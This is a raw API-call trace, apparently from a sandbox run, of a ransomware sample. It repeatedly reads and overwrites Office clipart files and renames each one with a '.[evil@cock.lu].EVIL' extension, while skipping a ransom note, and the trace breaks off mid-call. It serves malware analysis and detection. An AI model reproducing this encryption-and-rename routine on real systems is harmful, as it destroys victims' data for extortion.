[0170.600] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02048_.WMF") returned 0x45 [0170.600] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02048_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02048_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.602] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1fde, lpOverlapped=0x0) returned 1 [0170.608] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.608] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.608] _errno () returned 0x84b1160840 [0170.608] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.608] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x1fe0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1fe0, lpOverlapped=0x0) returned 1 [0170.608] CloseHandle (hObject=0x1a8) returned 1 [0170.608] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02048_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.608] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.608] __uncaught_exception () returned 0x84b1160800 [0170.608] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.609] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02048_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02048_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02048_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02048_.wmf.[evil@cock.lu].evil")) returned 1 [0170.610] ??_V@YAXPEAX@Z () returned 0x1 [0170.613] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02048_.WMF", dwFileAttributes=0x200) returned 0 [0170.613] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.613] wcsstr (_Str="SO02051_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.613] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02051_.WMF") returned 69 [0170.613] wcscmp (_String1="SO02051_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.613] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02051_.WMF") returned 0x0 [0170.613] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02051_.WMF") returned 0x45 [0170.613] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02051_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02051_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.615] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2c2c, lpOverlapped=0x0) returned 1 [0170.618] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.618] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.618] _errno () returned 0x84b1160840 [0170.618] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.618] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x2c40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2c40, lpOverlapped=0x0) returned 1 [0170.618] CloseHandle (hObject=0x1a8) returned 1 [0170.618] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02051_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.618] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.618] __uncaught_exception () returned 0x84b1160800 [0170.618] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.619] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02051_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02051_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02051_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02051_.wmf.[evil@cock.lu].evil")) returned 1 [0170.620] ??_V@YAXPEAX@Z () returned 0x1 [0170.623] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02051_.WMF", dwFileAttributes=0x200) returned 0 [0170.623] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.623] wcsstr (_Str="SO02054_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.623] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02054_.WMF") returned 69 [0170.623] wcscmp (_String1="SO02054_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.623] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02054_.WMF") returned 0x0 [0170.623] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02054_.WMF") returned 0x45 [0170.623] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02054_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02054_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.625] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x30ca, lpOverlapped=0x0) returned 1 [0170.627] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.627] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.627] _errno () returned 0x84b1160840 [0170.627] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.627] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x30e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x30e0, lpOverlapped=0x0) returned 1 [0170.628] CloseHandle (hObject=0x1a8) returned 1 [0170.628] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02054_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.628] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.628] __uncaught_exception () returned 0x84b1160800 [0170.628] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.628] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02054_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02054_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02054_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02054_.wmf.[evil@cock.lu].evil")) returned 1 [0170.629] ??_V@YAXPEAX@Z () returned 0x1 [0170.632] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02054_.WMF", dwFileAttributes=0x200) returned 0 [0170.632] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.632] wcsstr (_Str="SO02055_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.632] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02055_.WMF") returned 69 [0170.632] wcscmp (_String1="SO02055_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.632] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02055_.WMF") returned 0x0 [0170.632] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02055_.WMF") returned 0x45 [0170.632] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02055_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02055_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.634] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4c4c, lpOverlapped=0x0) returned 1 [0170.636] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.636] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.637] _errno () returned 0x84b1160840 [0170.637] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.637] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x4c60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4c60, lpOverlapped=0x0) returned 1 [0170.637] CloseHandle (hObject=0x1a8) returned 1 [0170.637] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02055_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.637] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.637] __uncaught_exception () returned 0x84b1160800 [0170.637] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.637] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02055_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02055_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02055_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02055_.wmf.[evil@cock.lu].evil")) returned 1 [0170.638] ??_V@YAXPEAX@Z () returned 0x1 [0170.641] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02055_.WMF", dwFileAttributes=0x200) returned 0 [0170.641] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.641] wcsstr (_Str="SO02067_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.641] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02067_.WMF") returned 69 [0170.641] wcscmp (_String1="SO02067_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.641] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02067_.WMF") returned 0x0 [0170.641] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02067_.WMF") returned 0x45 [0170.641] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02067_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02067_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.643] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x382a, lpOverlapped=0x0) returned 1 [0170.646] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.646] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.646] _errno () returned 0x84b1160840 [0170.647] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.647] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x3840, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3840, lpOverlapped=0x0) returned 1 [0170.647] CloseHandle (hObject=0x1a8) returned 1 [0170.647] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02067_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.647] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.647] __uncaught_exception () returned 0x84b1160800 [0170.647] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.647] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02067_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02067_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02067_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02067_.wmf.[evil@cock.lu].evil")) returned 1 [0170.648] ??_V@YAXPEAX@Z () returned 0x1 [0170.651] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02067_.WMF", dwFileAttributes=0x200) returned 0 [0170.651] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.651] wcsstr (_Str="SO02094_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.651] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02094_.WMF") returned 69 [0170.651] wcscmp (_String1="SO02094_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.651] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02094_.WMF") returned 0x0 [0170.651] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02094_.WMF") returned 0x45 [0170.651] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02094_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02094_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.654] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1b4a, lpOverlapped=0x0) returned 1 [0170.661] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.661] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.661] _errno () returned 0x84b1160840 [0170.661] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.661] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x1b60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1b60, lpOverlapped=0x0) returned 1 [0170.661] CloseHandle (hObject=0x1a8) returned 1 [0170.661] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02094_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.661] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.661] __uncaught_exception () returned 0x84b1160800 [0170.661] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.662] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02094_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02094_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02094_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02094_.wmf.[evil@cock.lu].evil")) returned 1 [0170.663] ??_V@YAXPEAX@Z () returned 0x1 [0170.665] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02094_.WMF", dwFileAttributes=0x200) returned 0 [0170.665] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.665] wcsstr (_Str="SO02227_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.665] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02227_.WMF") returned 69 [0170.665] wcscmp (_String1="SO02227_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.665] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02227_.WMF") returned 0x0 [0170.665] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02227_.WMF") returned 0x45 [0170.665] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02227_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02227_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.667] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x540, lpOverlapped=0x0) returned 1 [0170.694] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.694] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.694] _errno () returned 0x84b1160840 [0170.695] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.695] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x560, lpOverlapped=0x0) returned 1 [0170.695] CloseHandle (hObject=0x1a8) returned 1 [0170.695] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02227_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.695] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.695] __uncaught_exception () returned 0x84b1160800 [0170.695] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.695] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02227_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02227_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02227_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02227_.wmf.[evil@cock.lu].evil")) returned 1 [0170.696] ??_V@YAXPEAX@Z () returned 0x1 [0170.699] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02227_.WMF", dwFileAttributes=0x200) returned 0 [0170.699] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.699] wcsstr (_Str="SO02228_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.699] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02228_.WMF") returned 69 [0170.699] wcscmp (_String1="SO02228_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.699] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02228_.WMF") returned 0x0 [0170.699] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02228_.WMF") returned 0x45 [0170.699] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02228_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02228_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.702] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x334, lpOverlapped=0x0) returned 1 [0170.726] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.726] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.726] _errno () returned 0x84b1160840 [0170.726] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.726] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x340, lpOverlapped=0x0) returned 1 [0170.726] CloseHandle (hObject=0x1a8) returned 1 [0170.726] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02228_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.726] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.727] __uncaught_exception () returned 0x84b1160800 [0170.727] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.727] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02228_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02228_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02228_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02228_.wmf.[evil@cock.lu].evil")) returned 1 [0170.728] ??_V@YAXPEAX@Z () returned 0x1 [0170.731] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02228_.WMF", dwFileAttributes=0x200) returned 0 [0170.731] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.731] wcsstr (_Str="SO02233_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.731] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02233_.WMF") returned 69 [0170.731] wcscmp (_String1="SO02233_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.731] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02233_.WMF") returned 0x0 [0170.731] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02233_.WMF") returned 0x45 [0170.731] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02233_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02233_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 